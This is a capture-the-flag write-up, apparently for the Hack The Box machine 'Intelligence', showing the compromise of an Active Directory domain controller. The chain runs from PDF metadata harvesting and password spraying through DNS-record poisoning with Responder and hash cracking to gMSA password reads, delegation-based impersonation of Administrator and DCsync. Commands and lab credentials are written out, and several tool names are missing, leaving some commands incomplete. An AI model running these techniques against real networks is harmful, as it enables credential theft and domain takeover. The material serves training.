Password: PentestEverything



nmap -p- -sS -sV                                                                                                                                    

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-16 03:37:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
59877/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Add " intelligence.htb" to /etc/hosts.

Starting out on port 80 we come to the root page for Intelligence.

Running feroxbuster against the host revelas few results.

 feroxbuster -u -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 

We see that further down the main page we have an opportunity to download a PDF document. At a glance there is nothing special about the document.

However, pulling metadata from the PDF document reveals potentially interesting user information.

We can achieve this withe exiftool.

exiftool 2020-01-01-upload.pdf

We can then put the username into a known user text file and checking if the name is valid with kerbrute.

kerbrute userenum users.txt -d intelligence.htb --dc

Great, we have a valid username. However, I was unable to brute force this user account. We also know the the account does not have pre-authentication enabled...

Looking back at the original request for the PDF document we notice we are unable list the contents or browse to the /documents directory on port 80.

The URL request for the document download has potentially fuzzable areas in the file name. We can try fuzzing for other PDF documents in the date range of the file name.

Firstly, I started OWASP ZAP and requested the PDF document again. From here I selected the request and sent it to the fuzzer.

To ensure complete coverage I selected each individual numeral from the date and added individual payloads for numbers 0-9 using the Numberzz module.

Then executed the fuzzer, in total we send 10000 requests to the target. Once completed sorting the results by size shows which requests have PDF documents available.

Highlighting all the request with a response body larger than 1,245 bytes should represent everything of interest.

Once we highlight all the request of interest we can right click to open the contextual menu and "Copy URLs to clipboard" and paste the results into a text file.

With a list of URLs we can run xargs with curl to download from each URL.

xargs -n 1 curl -O < "URLs.txt" 

We can then run exiftool against all PDF's and extract the creator names into a known users file.

exiftool -r *.pdf | grep Creator | sed 's/Creator                         : //' | sort | uniq > KnownUsers.txt

Checking against kerbrute for pre-authentication we do not get any positive hits. We do at least confirm the existence of users so far.

From here I tried brute forcing the username list for quite some time, utilizing various common password lists and could not get a single hit over any of the available protocols.

Digging deeper into our results I looked into parsing all the PDF documents for interesting information.

I researched the best way to parse PDF documents recursively for information and came across pdfgrep.


sudo apt install pdfgrep

Using the following command and specified pattern we identify something of interest.

pdfgrep  pass -r .

Opening the file 2020-06-04-upload.pdf show us a potential password.



We can spray this password with crackmapexec against SMB with our user list.

crackmapexec smb '' -u 'users.txt' -p 'NewIntelligenceCorpUser9876'

Where we the following valid credentials:


I was unable to utilize the user credentials to gain shell on the target system. We can however, use for external information gathering.


sudo python2 -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -c All -d intelligence.htb -gc dc.intelligence.htb -ns --dns-timeout 20 --zip

Looking at the Bloodhound results we have found a path for performing privilege escalation. First we need to try and get access to either Ted's or Laura's AD accounts.

Back to our tiffany user we look at SMB. We see we have read access to the IT Share.

smbmap -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -H 

Inside the IT share we find a PowerShell script which can be downloaded. The contents of which has been shown below:

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
} catch {}

Looking at the script it looks like a list of DNS records is fetched from LDAP and any records with name like "web" are then used in an Invoke-WebRequest to test if alive. The parameter -- -UseDefaultCredentials runs the script in the context of the user. Hopefully this will be Ted going by the Send-MailMessage parameters.

We can probably use Responder to try and catch a NTLM hash here. First we need a way for a new DNS record to point back to us. can be used to add a new DNS record into into the target domain. The command below adds a new DNS record starting with "web" to trigger the PowerShell script that runs every 5 minutes.


sudo python3 -u intelligence.htb\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r Webfake.intelligence.htb -a add -d 

We can confirm the DNS record has been added by using ldapsearcher with tiffany's credentials.

ldapsearch -x -h -D 'CN=Tiffany Molina,CN=Users,DC=intelligence,DC=htb' -w 'NewIntelligenceCorpUser9876' -b "DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | grep Web 

Then we can start Responder (with default responder.conf file). After around five minutes we should catch an NTLMv2 hash where the PowerShell script is triggered and points back to our attacking machine.

sudo python2 -I tun0 -A

NTLMv2 hash


We can then crack password with hashcat against the rockyou.txt password list.

hashcat -m 5600 hash.hash /usr/share/wordlists/rockyou.txt

We now have the following credentials


Now that we have access to Ted's account we can refer back to the Bloodhound attack path identified earlier on.

GMSA or Group Managed Serivce Accounts **** offer a more automated and secure way to manage service accounts. Stealthbits have a great blog post on what they are and how they are implimented linked below.

gMSADUmper is a python script that can be utilized to read the msDS-ManagedPassword **** attribute and decrypt with the msDS-ManagedPasswordID attribute.


python3 -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l



From the BloodHound results earlier we see svc_int has delegate access to the domain controller.

Now with the svc_int account hash we can then use Impacket's to retrieve a service ticket for the service we have delegate rights to "www" and impersonate another user "administrator".

When performing this impersonating method we also get access to any services that are accessible to the impersponated account. Impersonating the administrator account gives us the ability to access services such as LDAP (DCsync Attack) or HOST ( intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb -spn WWW/dc.intelligence.htb -impersonate Administrator

Then run the following command to set the kerberos ticket use with Impacket.

export KRB5CCNAME=Administrator.ccache can be used to then perform a DCsync attack and dump hashes. -k -no-pass dc.intelligence.htb can also be used for direct system access as the administrator account. -k -no-pass dc.intelligence.htb

Last updated